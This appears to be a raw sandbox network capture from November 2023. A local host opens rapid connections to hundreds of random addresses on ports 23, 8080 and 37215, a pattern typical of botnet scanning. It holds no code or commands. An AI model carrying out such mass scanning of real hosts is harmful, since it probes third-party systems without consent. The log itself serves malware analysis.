                                              Nov 23, 2023 05:14:50.039022923 CET478168080192.168.2.1494.51.22.13
                                              Nov 23, 2023 05:14:50.039024115 CET478168080192.168.2.1494.12.203.207
                                              Nov 23, 2023 05:14:50.039026976 CET478168080192.168.2.1494.172.71.94
                                              Nov 23, 2023 05:14:50.039026976 CET478168080192.168.2.1495.4.41.22
                                              Nov 23, 2023 05:14:50.039027929 CET478168080192.168.2.1431.216.219.84
                                              Nov 23, 2023 05:14:50.039036989 CET478168080192.168.2.1495.47.36.142
                                              Nov 23, 2023 05:14:50.039040089 CET478168080192.168.2.1495.215.17.227
                                              Nov 23, 2023 05:14:50.039046049 CET478168080192.168.2.1431.98.152.17
                                              Nov 23, 2023 05:14:50.039053917 CET478168080192.168.2.1494.2.122.16
                                              Nov 23, 2023 05:14:50.039283037 CET575308080192.168.2.1431.136.28.87
                                              Nov 23, 2023 05:14:50.039345980 CET488048080192.168.2.1494.122.104.168
                                              Nov 23, 2023 05:14:50.039361954 CET366248080192.168.2.1494.122.6.45
                                              Nov 23, 2023 05:14:50.039376974 CET475168080192.168.2.1494.121.186.157
                                              Nov 23, 2023 05:14:50.039382935 CET547748080192.168.2.1494.120.12.111
                                              Nov 23, 2023 05:14:50.039400101 CET452608080192.168.2.1494.64.14.98
                                              Nov 23, 2023 05:14:50.039414883 CET384308080192.168.2.1494.240.114.86
                                              Nov 23, 2023 05:14:50.098696947 CET2347828121.127.63.40192.168.2.14
                                              Nov 23, 2023 05:14:50.105689049 CET2347828176.111.161.138192.168.2.14
                                              Nov 23, 2023 05:14:50.155071020 CET80804781631.204.28.47192.168.2.14
                                              Nov 23, 2023 05:14:50.176043034 CET3721547830156.235.103.206192.168.2.14
                                              Nov 23, 2023 05:14:50.176240921 CET4783037215192.168.2.14156.235.103.206
                                              Nov 23, 2023 05:14:50.185933113 CET234782869.89.17.197192.168.2.14
                                              Nov 23, 2023 05:14:50.221858978 CET80804781631.136.62.2192.168.2.14
                                              Nov 23, 2023 05:14:50.221936941 CET478168080192.168.2.1431.136.62.2
                                              Nov 23, 2023 05:14:50.227617979 CET80804781685.28.61.174192.168.2.14
                                              Nov 23, 2023 05:14:50.231887102 CET80804781631.190.57.226192.168.2.14
                                              Nov 23, 2023 05:14:50.236171961 CET80804781662.94.214.12192.168.2.14
                                              Nov 23, 2023 05:14:50.236242056 CET478168080192.168.2.1462.94.214.12
                                              Nov 23, 2023 05:14:50.239752054 CET80804781695.97.4.11192.168.2.14
                                              Nov 23, 2023 05:14:50.242763042 CET80804781662.168.27.97192.168.2.14
                                              Nov 23, 2023 05:14:50.247642040 CET80804781695.250.139.76192.168.2.14
                                              Nov 23, 2023 05:14:50.250927925 CET3721547830197.56.231.159192.168.2.14
                                              Nov 23, 2023 05:14:50.258573055 CET80804781695.153.33.81192.168.2.14
                                              Nov 23, 2023 05:14:50.264822006 CET80804781685.187.7.243192.168.2.14
                                              Nov 23, 2023 05:14:50.276206017 CET3721547830197.210.179.216192.168.2.14
                                              Nov 23, 2023 05:14:50.276221037 CET234782860.93.27.237192.168.2.14
                                              Nov 23, 2023 05:14:50.281250000 CET80804781631.173.28.171192.168.2.14
                                              Nov 23, 2023 05:14:50.284101009 CET372154783041.78.156.233192.168.2.14
                                              Nov 23, 2023 05:14:50.284164906 CET4783037215192.168.2.1441.78.156.233
                                              Nov 23, 2023 05:14:50.293534994 CET80804781631.146.24.217192.168.2.14
                                              Nov 23, 2023 05:14:50.303477049 CET3721547830197.4.1.254192.168.2.14
                                              Nov 23, 2023 05:14:50.304306030 CET2347828119.215.170.109192.168.2.14
                                              Nov 23, 2023 05:14:50.307303905 CET2347828115.227.231.142192.168.2.14
                                              Nov 23, 2023 05:14:50.308834076 CET80804781695.170.119.222192.168.2.14
                                              Nov 23, 2023 05:14:50.322551012 CET3721547830156.254.88.148192.168.2.14
                                              Nov 23, 2023 05:14:50.322621107 CET4783037215192.168.2.14156.254.88.148
                                              Nov 23, 2023 05:14:50.323204041 CET3721547830156.226.15.209192.168.2.14
                                              Nov 23, 2023 05:14:50.323244095 CET4783037215192.168.2.14156.226.15.209
                                              Nov 23, 2023 05:14:50.333384037 CET80804781694.184.116.246192.168.2.14
                                              Nov 23, 2023 05:14:50.337045908 CET234782814.98.166.149192.168.2.14
                                              Nov 23, 2023 05:14:50.341386080 CET2347828202.20.107.159192.168.2.14
                                              Nov 23, 2023 05:14:50.366908073 CET372154783041.160.32.15192.168.2.14
                                              Nov 23, 2023 05:14:51.002542019 CET4782823192.168.2.1475.96.1.20
                                              Nov 23, 2023 05:14:51.002542019 CET4782823192.168.2.14177.108.6.251
                                              Nov 23, 2023 05:14:51.002542019 CET4782823192.168.2.14200.221.43.244
                                              Nov 23, 2023 05:14:51.002571106 CET4782823192.168.2.14186.208.152.199
                                              Nov 23, 2023 05:14:51.002578020 CET4782823192.168.2.14185.234.64.173
                                              Nov 23, 2023 05:14:51.002579927 CET4782823192.168.2.14182.120.74.57
                                              Nov 23, 2023 05:14:51.002587080 CET4782823192.168.2.1496.13.48.209
                                              Nov 23, 2023 05:14:51.002588987 CET4782823192.168.2.1487.62.75.133
                                              Nov 23, 2023 05:14:51.002588987 CET4782823192.168.2.14179.208.247.222
                                              Nov 23, 2023 05:14:51.002598047 CET4782823192.168.2.14100.145.127.2
                                              Nov 23, 2023 05:14:51.002598047 CET4782823192.168.2.1478.40.231.64
                                              Nov 23, 2023 05:14:51.002598047 CET4782823192.168.2.14156.197.188.104
                                              Nov 23, 2023 05:14:51.002598047 CET4782823192.168.2.14169.234.200.188
                                              Nov 23, 2023 05:14:51.002603054 CET4782823192.168.2.1469.124.74.1
                                              Nov 23, 2023 05:14:51.002603054 CET4782823192.168.2.14147.95.10.34
                                              Nov 23, 2023 05:14:51.002603054 CET4782823192.168.2.14172.176.133.58
                                              Nov 23, 2023 05:14:51.002607107 CET4782823192.168.2.14148.228.173.54
                                              Nov 23, 2023 05:14:51.002628088 CET4782823192.168.2.1474.138.160.131
                                              Nov 23, 2023 05:14:51.002628088 CET4782823192.168.2.1412.120.115.65
                                              Nov 23, 2023 05:14:51.002629995 CET4782823192.168.2.1453.19.8.68
                                              Nov 23, 2023 05:14:51.002633095 CET4782823192.168.2.1458.126.155.238
                                              Nov 23, 2023 05:14:51.002633095 CET4782823192.168.2.14166.103.154.6
                                              Nov 23, 2023 05:14:51.002634048 CET4782823192.168.2.14125.71.204.247
                                              Nov 23, 2023 05:14:51.002634048 CET4782823192.168.2.14115.3.17.202
                                              Nov 23, 2023 05:14:51.002639055 CET4782823192.168.2.14207.59.208.47
                                              Nov 23, 2023 05:14:51.002674103 CET4782823192.168.2.14148.251.87.33
                                              Nov 23, 2023 05:14:51.002674103 CET4782823192.168.2.14107.28.3.169
                                              Nov 23, 2023 05:14:51.002674103 CET4782823192.168.2.14218.229.229.153
                                              Nov 23, 2023 05:14:51.002676010 CET4782823192.168.2.14246.46.155.0
                                              Nov 23, 2023 05:14:51.002680063 CET4782823192.168.2.14204.233.97.156
                                              Nov 23, 2023 05:14:51.002681971 CET4782823192.168.2.14248.81.35.198
                                              Nov 23, 2023 05:14:51.002682924 CET4782823192.168.2.14254.203.86.203
                                              Nov 23, 2023 05:14:51.002682924 CET4782823192.168.2.14201.72.89.232
                                              Nov 23, 2023 05:14:51.002682924 CET4782823192.168.2.14107.216.132.0
                                              Nov 23, 2023 05:14:51.002682924 CET4782823192.168.2.1442.104.146.33
                                              Nov 23, 2023 05:14:51.002684116 CET4782823192.168.2.14144.254.44.71
                                              Nov 23, 2023 05:14:51.002682924 CET4782823192.168.2.1437.21.11.140
                                              Nov 23, 2023 05:14:51.002684116 CET4782823192.168.2.14196.76.146.127
                                              Nov 23, 2023 05:14:51.002684116 CET4782823192.168.2.14158.108.249.220
                                              Nov 23, 2023 05:14:51.002758026 CET4782823192.168.2.14211.248.177.138
                                              Nov 23, 2023 05:14:51.002758026 CET4782823192.168.2.1416.155.151.47
                                              Nov 23, 2023 05:14:51.002758026 CET4782823192.168.2.14206.39.142.246
                                              Nov 23, 2023 05:14:51.002762079 CET4782823192.168.2.14128.250.112.112
                                              Nov 23, 2023 05:14:51.002762079 CET4782823192.168.2.1442.173.188.219
                                              Nov 23, 2023 05:14:51.002762079 CET4782823192.168.2.14149.176.120.155
                                              Nov 23, 2023 05:14:51.002762079 CET4782823192.168.2.14173.219.107.93
                                              Nov 23, 2023 05:14:51.002763987 CET4782823192.168.2.14248.58.50.104
                                              Nov 23, 2023 05:14:51.002764940 CET4782823192.168.2.1446.200.59.176
                                              Nov 23, 2023 05:14:51.002765894 CET4782823192.168.2.14114.230.48.25
                                              Nov 23, 2023 05:14:51.002765894 CET4782823192.168.2.1465.241.121.196
                                              Nov 23, 2023 05:14:51.002767086 CET4782823192.168.2.14192.30.150.130
                                              Nov 23, 2023 05:14:51.002768040 CET4782823192.168.2.1431.161.217.113
                                              Nov 23, 2023 05:14:51.002763033 CET4782823192.168.2.14103.11.224.133
                                              Nov 23, 2023 05:14:51.002763033 CET4782823192.168.2.14142.158.144.242
                                              Nov 23, 2023 05:14:51.002763033 CET4782823192.168.2.14117.234.27.40
                                              Nov 23, 2023 05:14:51.002824068 CET4782823192.168.2.14149.75.1.36
                                              Nov 23, 2023 05:14:51.002824068 CET4782823192.168.2.14177.188.180.193
                                              Nov 23, 2023 05:14:51.002824068 CET4782823192.168.2.14219.149.113.112
                                              Nov 23, 2023 05:14:51.002824068 CET4782823192.168.2.1485.169.207.243
                                              Nov 23, 2023 05:14:51.002824068 CET4782823192.168.2.1472.16.14.115
                                              Nov 23, 2023 05:14:51.002826929 CET4782823192.168.2.14151.175.82.40
                                              Nov 23, 2023 05:14:51.002826929 CET4782823192.168.2.1413.141.233.55
                                              Nov 23, 2023 05:14:51.002829075 CET4782823192.168.2.14145.236.165.135
                                              Nov 23, 2023 05:14:51.002829075 CET4782823192.168.2.14185.50.30.156
                                              Nov 23, 2023 05:14:51.002829075 CET4782823192.168.2.14155.168.239.126
                                              Nov 23, 2023 05:14:51.002830029 CET4782823192.168.2.1496.100.244.150
                                              Nov 23, 2023 05:14:51.002830029 CET4782823192.168.2.1496.82.234.235
                                              Nov 23, 2023 05:14:51.002830029 CET4782823192.168.2.14197.154.190.222
                                              Nov 23, 2023 05:14:51.002830029 CET4782823192.168.2.14106.127.33.84
                                              Nov 23, 2023 05:14:51.002830029 CET4782823192.168.2.14199.109.198.141
                                              Nov 23, 2023 05:14:51.002831936 CET4782823192.168.2.14251.249.157.201
                                              Nov 23, 2023 05:14:51.002829075 CET4782823192.168.2.1491.50.140.240
                                              Nov 23, 2023 05:14:51.002831936 CET4782823192.168.2.1459.104.103.133
                                              Nov 23, 2023 05:14:51.002829075 CET4782823192.168.2.14196.100.187.210
                                              Nov 23, 2023 05:14:51.002831936 CET4782823192.168.2.14253.174.219.120
                                              Nov 23, 2023 05:14:51.002829075 CET4782823192.168.2.14212.204.140.107
                                              Nov 23, 2023 05:14:51.002829075 CET4782823192.168.2.1440.190.121.184
                                              Nov 23, 2023 05:14:51.002830029 CET4782823192.168.2.1494.97.82.22
                                              Nov 23, 2023 05:14:51.002830029 CET4782823192.168.2.1418.216.162.7
                                              Nov 23, 2023 05:14:51.002911091 CET4782823192.168.2.1497.143.203.11
                                              Nov 23, 2023 05:14:51.002913952 CET4782823192.168.2.14177.209.187.124
                                              Nov 23, 2023 05:14:51.002913952 CET4782823192.168.2.1486.203.67.76
                                              Nov 23, 2023 05:14:51.002913952 CET4782823192.168.2.14181.33.168.61
                                              Nov 23, 2023 05:14:51.002913952 CET4782823192.168.2.14121.30.221.237
                                              Nov 23, 2023 05:14:51.002913952 CET4782823192.168.2.14119.19.172.97
                                              Nov 23, 2023 05:14:51.002913952 CET4782823192.168.2.142.102.218.188
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.14221.63.193.128
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.14171.4.12.101
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.1492.116.254.192
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.14191.90.133.152
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.14180.40.166.55
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.14179.37.128.175
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.14113.182.254.19
                                              Nov 23, 2023 05:14:51.002918005 CET4782823192.168.2.14209.194.4.53
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.1432.116.251.189
                                              Nov 23, 2023 05:14:51.002921104 CET4782823192.168.2.1431.6.237.74
                                              Nov 23, 2023 05:14:51.002918005 CET4782823192.168.2.14136.82.201.17
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.14123.84.213.171
                                              Nov 23, 2023 05:14:51.002918005 CET4782823192.168.2.14186.206.99.30
                                              Nov 23, 2023 05:14:51.002916098 CET4782823192.168.2.14125.10.180.61
                                              Nov 23, 2023 05:14:51.002918005 CET4782823192.168.2.1479.117.173.204
                                              Nov 23, 2023 05:14:51.002919912 CET4782823192.168.2.1441.132.144.187
                                              Nov 23, 2023 05:14:51.002918005 CET4782823192.168.2.1473.253.22.250
                                              Nov 23, 2023 05:14:51.002918005 CET4782823192.168.2.14123.215.109.29
                                              Nov 23, 2023 05:14:51.002921104 CET4782823192.168.2.14172.162.175.230
                                              Nov 23, 2023 05:14:51.002918005 CET4782823192.168.2.14147.34.18.15
                                              Nov 23, 2023 05:14:51.002919912 CET4782823192.168.2.14146.175.126.1
                                              Nov 23, 2023 05:14:51.002918005 CET4782823192.168.2.14200.232.48.26
                                              Nov 23, 2023 05:14:51.002918005 CET4782823192.168.2.14200.158.52.101
                                              Nov 23, 2023 05:14:51.002919912 CET4782823192.168.2.14116.5.250.196
                                              Nov 23, 2023 05:14:51.002918959 CET4782823192.168.2.14241.189.124.206
                                              Nov 23, 2023 05:14:51.002919912 CET4782823192.168.2.144.187.136.131
                                              Nov 23, 2023 05:14:51.002918959 CET4782823192.168.2.14244.194.147.203
                                              Nov 23, 2023 05:14:51.002985954 CET4782823192.168.2.14150.127.188.2
                                              Nov 23, 2023 05:14:51.002985954 CET4782823192.168.2.14181.28.233.131
                                              Nov 23, 2023 05:14:51.002985954 CET4782823192.168.2.14107.254.204.156
                                              Nov 23, 2023 05:14:51.002988100 CET4782823192.168.2.14204.41.76.198
                                              Nov 23, 2023 05:14:51.002989054 CET4782823192.168.2.1476.17.165.211
                                              Nov 23, 2023 05:14:51.002989054 CET4782823192.168.2.1413.127.205.13
                                              Nov 23, 2023 05:14:51.002989054 CET4782823192.168.2.14168.157.92.59
                                              Nov 23, 2023 05:14:51.002989054 CET4782823192.168.2.14222.78.102.28
                                              Nov 23, 2023 05:14:51.002989054 CET4782823192.168.2.14211.8.80.96
                                              Nov 23, 2023 05:14:51.002990007 CET4782823192.168.2.1437.9.215.247
                                              Nov 23, 2023 05:14:51.002990007 CET4782823192.168.2.1431.1.160.248
                                              Nov 23, 2023 05:14:51.002990007 CET4782823192.168.2.1468.98.15.7
                                              Nov 23, 2023 05:14:51.002990007 CET4782823192.168.2.1472.85.22.29
                                              Nov 23, 2023 05:14:51.002990007 CET4782823192.168.2.14151.149.42.100
                                              Nov 23, 2023 05:14:51.002991915 CET4782823192.168.2.1487.111.14.162
                                              Nov 23, 2023 05:14:51.002993107 CET4782823192.168.2.14182.236.104.43
                                              Nov 23, 2023 05:14:51.002993107 CET4782823192.168.2.14161.164.135.65
                                              Nov 23, 2023 05:14:51.002993107 CET4782823192.168.2.1495.122.241.208
                                              Nov 23, 2023 05:14:51.002993107 CET4782823192.168.2.14104.104.225.118
                                              Nov 23, 2023 05:14:51.002993107 CET4782823192.168.2.1494.246.253.131
                                              Nov 23, 2023 05:14:51.002994061 CET4782823192.168.2.14105.124.13.8
                                              Nov 23, 2023 05:14:51.002994061 CET4782823192.168.2.1499.240.187.133
                                              Nov 23, 2023 05:14:51.003000021 CET4782823192.168.2.14244.243.20.254
                                              Nov 23, 2023 05:14:51.003000021 CET4782823192.168.2.1420.225.108.184
                                              Nov 23, 2023 05:14:51.003000975 CET4782823192.168.2.1476.211.147.35
                                              Nov 23, 2023 05:14:51.003000021 CET4782823192.168.2.1414.19.56.182
                                              Nov 23, 2023 05:14:51.003000021 CET4782823192.168.2.1474.179.126.1
                                              Nov 23, 2023 05:14:51.003000975 CET4782823192.168.2.1447.135.50.192
                                              Nov 23, 2023 05:14:51.003000021 CET4782823192.168.2.1486.104.31.147
                                              Nov 23, 2023 05:14:51.003000021 CET4782823192.168.2.1413.234.183.59
                                              Nov 23, 2023 05:14:51.003041983 CET4782823192.168.2.14177.225.64.152
                                              Nov 23, 2023 05:14:51.003041983 CET4782823192.168.2.14186.13.253.97
                                              Nov 23, 2023 05:14:51.003041983 CET4782823192.168.2.1458.247.165.204
                                              Nov 23, 2023 05:14:51.003041983 CET4782823192.168.2.14105.210.140.1
                                              Nov 23, 2023 05:14:51.003065109 CET4782823192.168.2.14253.39.227.143
                                              Nov 23, 2023 05:14:51.003065109 CET4782823192.168.2.14112.170.15.39
                                              Nov 23, 2023 05:14:51.003065109 CET4782823192.168.2.1444.134.201.197
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14253.237.210.108
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14242.238.158.206
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14200.179.162.137
                                              Nov 23, 2023 05:14:51.003071070 CET4782823192.168.2.14173.8.217.180
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14187.185.94.224
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14159.246.160.36
                                              Nov 23, 2023 05:14:51.003071070 CET4782823192.168.2.14167.165.165.92
                                              Nov 23, 2023 05:14:51.003072977 CET4782823192.168.2.14148.218.82.121
                                              Nov 23, 2023 05:14:51.003071070 CET4782823192.168.2.14171.26.24.199
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.1416.194.165.249
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14102.92.164.53
                                              Nov 23, 2023 05:14:51.003071070 CET4782823192.168.2.1441.191.189.214
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14166.89.133.204
                                              Nov 23, 2023 05:14:51.003076077 CET4782823192.168.2.1454.118.13.174
                                              Nov 23, 2023 05:14:51.003072977 CET4782823192.168.2.14145.226.244.254
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14195.11.166.145
                                              Nov 23, 2023 05:14:51.003071070 CET4782823192.168.2.14161.234.191.136
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.1462.194.230.32
                                              Nov 23, 2023 05:14:51.003071070 CET4782823192.168.2.14213.182.167.104
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14177.69.213.97
                                              Nov 23, 2023 05:14:51.003071070 CET4782823192.168.2.14161.208.27.225
                                              Nov 23, 2023 05:14:51.003070116 CET4782823192.168.2.14204.145.106.54
                                              Nov 23, 2023 05:14:51.003071070 CET4782823192.168.2.1413.62.194.17
                                              Nov 23, 2023 05:14:51.003076077 CET4782823192.168.2.1414.41.222.129
                                              Nov 23, 2023 05:14:51.003072977 CET4782823192.168.2.1465.162.82.137
                                              Nov 23, 2023 05:14:51.003072977 CET4782823192.168.2.14167.35.106.236
                                              Nov 23, 2023 05:14:51.003072977 CET4782823192.168.2.14108.3.130.80
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.1468.87.212.122
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.1442.164.229.182
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.1498.80.13.80
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.14218.42.242.112
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.1460.16.142.2
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.14244.39.112.246
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.1412.191.37.105
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.1475.151.193.237
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.1468.186.144.24
                                              Nov 23, 2023 05:14:51.003103018 CET4782823192.168.2.1417.122.217.106
                                              Nov 23, 2023 05:14:51.003106117 CET4782823192.168.2.14121.23.177.184
                                              Nov 23, 2023 05:14:51.003106117 CET4782823192.168.2.14166.171.102.148
                                              Nov 23, 2023 05:14:51.003106117 CET4782823192.168.2.14161.134.126.253
                                              Nov 23, 2023 05:14:51.003106117 CET4782823192.168.2.14123.16.169.24
                                              Nov 23, 2023 05:14:51.003106117 CET4782823192.168.2.1447.205.182.232
                                              Nov 23, 2023 05:14:51.003106117 CET4782823192.168.2.14111.15.76.128
                                              Nov 23, 2023 05:14:51.003108978 CET4782823192.168.2.1414.10.3.206
                                              Nov 23, 2023 05:14:51.003108978 CET4782823192.168.2.14100.22.90.147
                                              Nov 23, 2023 05:14:51.003108978 CET4782823192.168.2.14149.78.132.174
                                              Nov 23, 2023 05:14:51.003127098 CET4782823192.168.2.14194.107.239.84
                                              Nov 23, 2023 05:14:51.003127098 CET4782823192.168.2.14240.90.48.203
                                              Nov 23, 2023 05:14:51.003127098 CET4782823192.168.2.1432.134.246.254
                                              Nov 23, 2023 05:14:51.003137112 CET4782823192.168.2.14204.182.112.103
                                              Nov 23, 2023 05:14:51.003137112 CET4782823192.168.2.14216.232.206.78
                                              Nov 23, 2023 05:14:51.003138065 CET4782823192.168.2.14124.52.146.127
                                              Nov 23, 2023 05:14:51.003137112 CET4782823192.168.2.14155.10.117.35
                                              Nov 23, 2023 05:14:51.003138065 CET4782823192.168.2.14202.30.9.55
                                              Nov 23, 2023 05:14:51.003137112 CET4782823192.168.2.14193.58.28.96
                                              Nov 23, 2023 05:14:51.003137112 CET4782823192.168.2.14126.162.185.12
                                              Nov 23, 2023 05:14:51.003149033 CET4782823192.168.2.14156.6.0.223
                                              Nov 23, 2023 05:14:51.003149033 CET4782823192.168.2.14203.149.88.206
                                              Nov 23, 2023 05:14:51.003149033 CET4782823192.168.2.14192.183.145.86
                                              Nov 23, 2023 05:14:51.003149033 CET4782823192.168.2.14103.10.14.221
                                              Nov 23, 2023 05:14:51.003165007 CET4782823192.168.2.14124.230.153.181
                                              Nov 23, 2023 05:14:51.003165007 CET4782823192.168.2.14130.174.11.136
                                              Nov 23, 2023 05:14:51.003165007 CET4782823192.168.2.14124.218.99.120
                                              Nov 23, 2023 05:14:51.003165007 CET4782823192.168.2.14173.35.206.124
                                              Nov 23, 2023 05:14:51.003165007 CET4782823192.168.2.14111.170.203.55
                                              Nov 23, 2023 05:14:51.003169060 CET4782823192.168.2.14190.154.196.187
                                              Nov 23, 2023 05:14:51.003169060 CET4782823192.168.2.1475.13.193.76
                                              Nov 23, 2023 05:14:51.003169060 CET4782823192.168.2.14115.39.122.32
                                              Nov 23, 2023 05:14:51.003169060 CET4782823192.168.2.14116.221.239.36
                                              Nov 23, 2023 05:14:51.003165007 CET4782823192.168.2.14112.242.136.207
                                              Nov 23, 2023 05:14:51.003169060 CET4782823192.168.2.14209.202.136.204
                                              Nov 23, 2023 05:14:51.003169060 CET4782823192.168.2.14208.50.26.182
                                              Nov 23, 2023 05:14:51.003175974 CET4782823192.168.2.14247.71.229.252
                                              Nov 23, 2023 05:14:51.003175974 CET4782823192.168.2.14102.33.39.73
                                              Nov 23, 2023 05:14:51.003180027 CET4782823192.168.2.14123.167.175.161
                                              Nov 23, 2023 05:14:51.003180027 CET4782823192.168.2.149.84.226.116
                                              Nov 23, 2023 05:14:51.003180027 CET4782823192.168.2.14103.164.10.41
                                              Nov 23, 2023 05:14:51.003180027 CET4782823192.168.2.1481.0.72.27
                                              Nov 23, 2023 05:14:51.003180027 CET4782823192.168.2.14254.20.52.98
                                              Nov 23, 2023 05:14:51.003180027 CET4782823192.168.2.14123.240.198.229
                                              Nov 23, 2023 05:14:51.003181934 CET4782823192.168.2.149.55.30.119
                                              Nov 23, 2023 05:14:51.003181934 CET4782823192.168.2.1478.240.9.14
                                              Nov 23, 2023 05:14:51.003181934 CET4782823192.168.2.1459.76.172.70
                                              Nov 23, 2023 05:14:51.003181934 CET4782823192.168.2.1443.115.118.161
                                              Nov 23, 2023 05:14:51.003181934 CET4782823192.168.2.14156.109.244.166
                                              Nov 23, 2023 05:14:51.003181934 CET4782823192.168.2.1419.190.160.245
                                              Nov 23, 2023 05:14:51.003181934 CET4782823192.168.2.14179.19.4.79
                                              Nov 23, 2023 05:14:51.003181934 CET4782823192.168.2.14197.243.72.25
                                              Nov 23, 2023 05:14:51.003186941 CET4782823192.168.2.1434.59.127.144
                                              Nov 23, 2023 05:14:51.003186941 CET4782823192.168.2.1473.30.87.131
                                              Nov 23, 2023 05:14:51.003186941 CET4782823192.168.2.14154.91.134.189
                                              Nov 23, 2023 05:14:51.003201008 CET4782823192.168.2.14222.10.157.27
                                              Nov 23, 2023 05:14:51.003213882 CET4782823192.168.2.14187.218.244.22
                                              Nov 23, 2023 05:14:51.003227949 CET4782823192.168.2.14118.204.199.197
                                              Nov 23, 2023 05:14:51.003232956 CET4782823192.168.2.14220.199.88.239
                                              Nov 23, 2023 05:14:51.003232956 CET4782823192.168.2.14197.170.159.28
                                              Nov 23, 2023 05:14:51.003232956 CET4782823192.168.2.14175.235.251.2
                                              Nov 23, 2023 05:14:51.003232956 CET4782823192.168.2.1483.249.40.219
                                              Nov 23, 2023 05:14:51.003232956 CET4782823192.168.2.14161.11.93.146
                                              Nov 23, 2023 05:14:51.003232956 CET4782823192.168.2.14191.112.130.160
                                              Nov 23, 2023 05:14:51.003251076 CET4782823192.168.2.14201.182.25.192
                                              Nov 23, 2023 05:14:51.003251076 CET4782823192.168.2.1468.130.236.208
                                              Nov 23, 2023 05:14:51.003257990 CET4782823192.168.2.14219.204.198.150
                                              Nov 23, 2023 05:14:51.003257990 CET4782823192.168.2.1463.132.5.167
                                              Nov 23, 2023 05:14:51.003257990 CET4782823192.168.2.14108.171.150.108
                                              Nov 23, 2023 05:14:51.003268957 CET4782823192.168.2.14210.138.207.106
                                              Nov 23, 2023 05:14:51.003269911 CET4782823192.168.2.14249.90.8.117
                                              Nov 23, 2023 05:14:51.003283024 CET4782823192.168.2.1459.192.157.147
                                              Nov 23, 2023 05:14:51.003287077 CET4782823192.168.2.14251.125.187.167
                                              Nov 23, 2023 05:14:51.003303051 CET4782823192.168.2.1431.37.162.201
                                              Nov 23, 2023 05:14:51.003304958 CET4782823192.168.2.14190.237.163.184
                                              Nov 23, 2023 05:14:51.003304958 CET4782823192.168.2.14161.168.197.205
                                              Nov 23, 2023 05:14:51.003308058 CET4782823192.168.2.14117.138.230.224
                                              Nov 23, 2023 05:14:51.003308058 CET4782823192.168.2.14168.172.197.99
                                              Nov 23, 2023 05:14:51.003308058 CET4782823192.168.2.14190.2.252.104
                                              Nov 23, 2023 05:14:51.003308058 CET4782823192.168.2.1497.228.127.70
                                              Nov 23, 2023 05:14:51.003308058 CET4782823192.168.2.14185.91.83.254
                                              Nov 23, 2023 05:14:51.003308058 CET4782823192.168.2.14142.44.5.203
                                              Nov 23, 2023 05:14:51.003324986 CET4782823192.168.2.14218.142.31.250
                                              Nov 23, 2023 05:14:51.003340006 CET4782823192.168.2.14202.187.220.84
                                              Nov 23, 2023 05:14:51.003341913 CET4782823192.168.2.14118.235.114.176
                                              Nov 23, 2023 05:14:51.003343105 CET4782823192.168.2.14248.220.209.142
                                              Nov 23, 2023 05:14:51.003341913 CET4782823192.168.2.1478.233.47.241
                                              Nov 23, 2023 05:14:51.003350019 CET4782823192.168.2.1473.221.217.139
                                              Nov 23, 2023 05:14:51.003351927 CET4782823192.168.2.145.2.77.165
                                              Nov 23, 2023 05:14:51.003365040 CET4782823192.168.2.14248.112.172.58
                                              Nov 23, 2023 05:14:51.003367901 CET4782823192.168.2.14175.111.151.252
                                              Nov 23, 2023 05:14:51.003390074 CET4782823192.168.2.1470.183.86.18
                                              Nov 23, 2023 05:14:51.003390074 CET4782823192.168.2.14176.154.62.22
                                              Nov 23, 2023 05:14:51.003401995 CET4782823192.168.2.14156.170.107.122
                                              Nov 23, 2023 05:14:51.003405094 CET4782823192.168.2.14186.97.86.82
                                              Nov 23, 2023 05:14:51.003417015 CET4782823192.168.2.14155.190.231.255
                                              Nov 23, 2023 05:14:51.003426075 CET4782823192.168.2.1440.56.251.3
                                              Nov 23, 2023 05:14:51.003442049 CET4782823192.168.2.1412.116.113.231
                                              Nov 23, 2023 05:14:51.003443003 CET4782823192.168.2.1458.143.79.209
                                              Nov 23, 2023 05:14:51.003451109 CET4782823192.168.2.14255.233.93.152
                                              Nov 23, 2023 05:14:51.003460884 CET4782823192.168.2.14152.228.250.181
                                              Nov 23, 2023 05:14:51.003478050 CET4782823192.168.2.1445.134.104.214
                                              Nov 23, 2023 05:14:51.003480911 CET4782823192.168.2.1493.94.34.227
                                              Nov 23, 2023 05:14:51.003484011 CET4782823192.168.2.1485.93.122.102
                                              Nov 23, 2023 05:14:51.003485918 CET4782823192.168.2.14188.249.163.23
                                              Nov 23, 2023 05:14:51.003504038 CET4782823192.168.2.14223.118.113.93
                                              Nov 23, 2023 05:14:51.003508091 CET4782823192.168.2.14118.61.127.104
                                              Nov 23, 2023 05:14:51.003511906 CET4782823192.168.2.14189.54.126.163
                                              Nov 23, 2023 05:14:51.003516912 CET4782823192.168.2.14206.243.60.39
                                              Nov 23, 2023 05:14:51.003516912 CET4782823192.168.2.1440.116.199.255
